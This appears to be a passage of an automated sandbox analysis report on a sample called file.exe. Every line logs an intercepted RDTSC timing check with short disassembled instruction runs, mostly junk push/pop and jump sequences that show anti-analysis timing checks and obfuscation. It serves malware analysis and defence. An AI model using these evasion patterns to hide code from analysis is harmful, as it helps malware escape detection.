Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47066 second address: D47079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47079 second address: D47083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0D344F4AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9FBC3 second address: D9FBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9FBC9 second address: D9FBFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0D344F4AC0h 0x0000000f jl 00007F0D344F4AB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9FDB4 second address: D9FDD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70906h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA5972 second address: DA5978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA5978 second address: DA597E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA597E second address: DA5982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4D0F second address: DA4D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0D34B708F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4E5B second address: DA4E61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4E61 second address: DA4E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4E67 second address: DA4E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4E6B second address: DA4E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4E71 second address: DA4E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4E80 second address: DA4ECD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FDh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F0D34B70903h 0x00000011 jmp 00007F0D34B708FCh 0x00000016 jg 00007F0D34B708F6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0D34B70901h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA5554 second address: DA555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAC25E second address: DAC279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70907h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAC521 second address: DAC527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAC527 second address: DAC52D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAC52D second address: DAC549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0D344F4AC4h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAD62E second address: DAD637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DADC03 second address: DADC19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D344F4AC2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DADC19 second address: DADC1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB5F59 second address: DB5F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB5F5D second address: DB5F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB5F6B second address: DB5F9C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D344F4AD7h 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F0D344F4AB6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB62B4 second address: DB62BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6579 second address: DB6597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6597 second address: DB659F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB69E8 second address: DB6A09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC0h 0x00000007 je 00007F0D344F4AB8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6A09 second address: DB6A18 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F0D34B708F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6BA7 second address: DB6BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D344F4ABAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6BB5 second address: DB6BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D34B708FAh 0x00000008 jc 00007F0D34B708F6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jno 00007F0D34B7090Bh 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007F0D34B708F6h 0x00000022 jmp 00007F0D34B708FBh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6BFC second address: DB6C18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F0D344F4AC1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB6C18 second address: DB6C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E44 second address: DC1E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E4A second address: DC1E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E4E second address: DC1E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jng 00007F0D344F4ABAh 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E66 second address: DC1E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E6A second address: DC1E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D344F4AC0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E84 second address: DC1E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E88 second address: DC1E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E8C second address: DC1E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0D34B708F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1E9C second address: DC1EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1EA2 second address: DC1EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC03F3 second address: DC041B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F0D344F4AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jns 00007F0D344F4AB6h 0x00000017 pop edx 0x00000018 jmp 00007F0D344F4ABDh 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC041B second address: DC0423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC0593 second address: DC059D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0D344F4AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC0703 second address: DC074D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0D34B70906h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jnl 00007F0D34B708F6h 0x00000019 jbe 00007F0D34B708F6h 0x0000001f popad 0x00000020 push ebx 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F0D34B70905h 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC0897 second address: DC08A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F0D344F4ABCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC08A4 second address: DC08B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F0D34B708F6h 0x0000000c js 00007F0D34B708F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC08B6 second address: DC08CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0D344F4ABCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC08CF second address: DC08D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC08D5 second address: DC08D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1D18 second address: DC1D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBFAE9 second address: DBFAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBFAED second address: DBFB0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F0D34B70909h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBFB0C second address: DBFB31 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D344F4ABEh 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F0D344F4AB6h 0x00000010 jc 00007F0D344F4ABEh 0x00000016 jno 00007F0D344F4AB6h 0x0000001c pushad 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBFB31 second address: DBFB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBFB39 second address: DBFB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC41B4 second address: DC41BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC41BA second address: DC41C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA3E0 second address: DCA401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 jmp 00007F0D34B70909h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA401 second address: DCA406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA406 second address: DCA40B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA40B second address: DCA420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0D344F4AB6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F0D344F4AB6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD7C82 second address: DD7C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD7C8B second address: DD7C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD7C8F second address: DD7C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDC18A second address: DDC1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0D344F4AB6h 0x0000000a jmp 00007F0D344F4AC7h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDC1B0 second address: DDC1BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDC1BD second address: DDC1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDC1C1 second address: DDC1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0D34B70907h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE930E second address: DE9314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEB0E5 second address: DEB105 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F0D34B70902h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEB105 second address: DEB110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0D344F4AB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEB110 second address: DEB11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0D34B708F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEB11A second address: DEB120 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DED8BC second address: DED8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0D34B708F8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DED8CC second address: DED8E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC8h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF4396 second address: DF439A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF463D second address: DF4642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF4642 second address: DF465B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D34B70902h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF4AA1 second address: DF4AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF72B8 second address: DF72D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F0D34B708F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFB000 second address: DFB03A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D344F4ABEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0D344F4ABFh 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jns 00007F0D344F4AB6h 0x00000019 jns 00007F0D344F4AB6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jng 00007F0D344F4AB6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFAD5B second address: DFAD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E17B34 second address: E17B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0D344F4AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E17B3E second address: E17B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70904h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F0D34B708F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E277B3 second address: E277E9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D344F4AB6h 0x00000008 jmp 00007F0D344F4AC5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0D344F4AC4h 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E27DE9 second address: E27E10 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F0D34B70911h 0x00000010 jmp 00007F0D34B70905h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E29C4A second address: E29C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0D344F4AE2h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E29C84 second address: E29C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2C7E3 second address: E2C813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F0D344F4ACDh 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2C813 second address: E2C85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F0D34B708F8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 push 00000004h 0x00000023 or dword ptr [ebp+122D1C98h], edx 0x00000029 call 00007F0D34B708F9h 0x0000002e jmp 00007F0D34B708FCh 0x00000033 push eax 0x00000034 push edi 0x00000035 push eax 0x00000036 push edx 0x00000037 push ecx 0x00000038 pop ecx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2C85C second address: E2C860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2C860 second address: E2C881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F0D34B708FAh 0x00000014 popad 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
